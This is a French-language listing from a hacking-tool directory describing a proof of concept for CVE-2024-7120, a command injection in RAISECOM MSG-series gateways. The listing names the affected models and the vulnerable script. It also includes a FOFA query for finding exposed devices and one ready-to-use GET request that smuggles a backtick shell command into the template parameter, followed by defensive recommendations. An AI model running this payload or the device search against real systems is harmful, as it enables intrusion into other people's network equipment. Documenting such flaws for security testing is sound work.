Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-7120 — Preuve de concept d'exploitation pour la vulnérabilité d'injection de commandes CVE-2024-7120 dans les passerelles RAISECOM. Fournit les détails d'exploitation, les modèles concernés et des exemples d'attaques basées sur curl pour les tests de sécurité. | Kitploit
Outils/GitHubGitHub/gh-ost00/cve-2024-7120
Sécurité IoTAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubgh-ost00/cve-2024-7120

CVE-2024-7120

Preuve de concept d'exploitation pour la vulnérabilité d'injection de commandes CVE-2024-7120 dans les passerelles RAISECOM. Fournit les détails d'exploitation, les modèles concernés et des exemples d'attaques basées sur curl pour les tests de sécurité.

Voir le dépôt
822il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Injection de commande des dispositifs Raisecom (CVE-2024-7120) Preuve de concept !

Aperçu

Une vulnérabilité d'injection de commande a été identifiée dans les dispositifs passerelle RAISECOM, affectant les modèles MSG1200, MSG2100E, MSG2200 et MSG2300. Cette vulnérabilité permet à des attaquants distants d'exécuter des commandes arbitraires sur le système via l'interface web. Le problème réside dans le script list_base_config.php, spécifiquement via le paramètre template, affectant plus de 25 112 dispositifs sur Internet.

✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

banner

Dispositifs affectés

Matériel

  • Modèles de passerelle RAISECOM MSG1200, MSG2100E, MSG2200, MSG2300

Logiciel

  • 3.90

Composants affectés

URI: /vpn/list_base_config.php

Description : le script list_base_config.php est un composant d'interface web des dispositifs passerelle RAISECOM utilisé pour gérer les configurations VPN. La vulnérabilité identifiée résulte d'une mauvaise gestion du paramètre template dans ce script. Ce paramètre peut être exploité pour exécuter des commandes arbitraires sur le système d'exploitation de l'appareil en raison d'une insuffisance de désinfection des entrées.

CWE

CWE-77: Injection de commande

Exploitation

Voici un exemple de la façon dont la vulnérabilité peut être exploitée en utilisant une commande curl :

root@kitploit:~
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Created by Ghost sec}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"

Dans cet exemple, la commande curl envoie une requête HTTP GET malveillante au script list_base_config.php. La requête utilise le paramètre template pour exécuter une commande.

Résultat réel

Exemple 1

banner

Exemple 2

banner

Recommandations

  1. Validation des entrées : Mettez en œuvre des contrôles de validation stricts sur toutes les entrées utilisateur, en particulier celles qui peuvent affecter les commandes système ou les chemins de fichiers.
  2. Contrôles d'accès : Restreignez l'accès à l'interface web de l'appareil aux réseaux de confiance et aux utilisateurs authentifiés.
Télécharger l’outil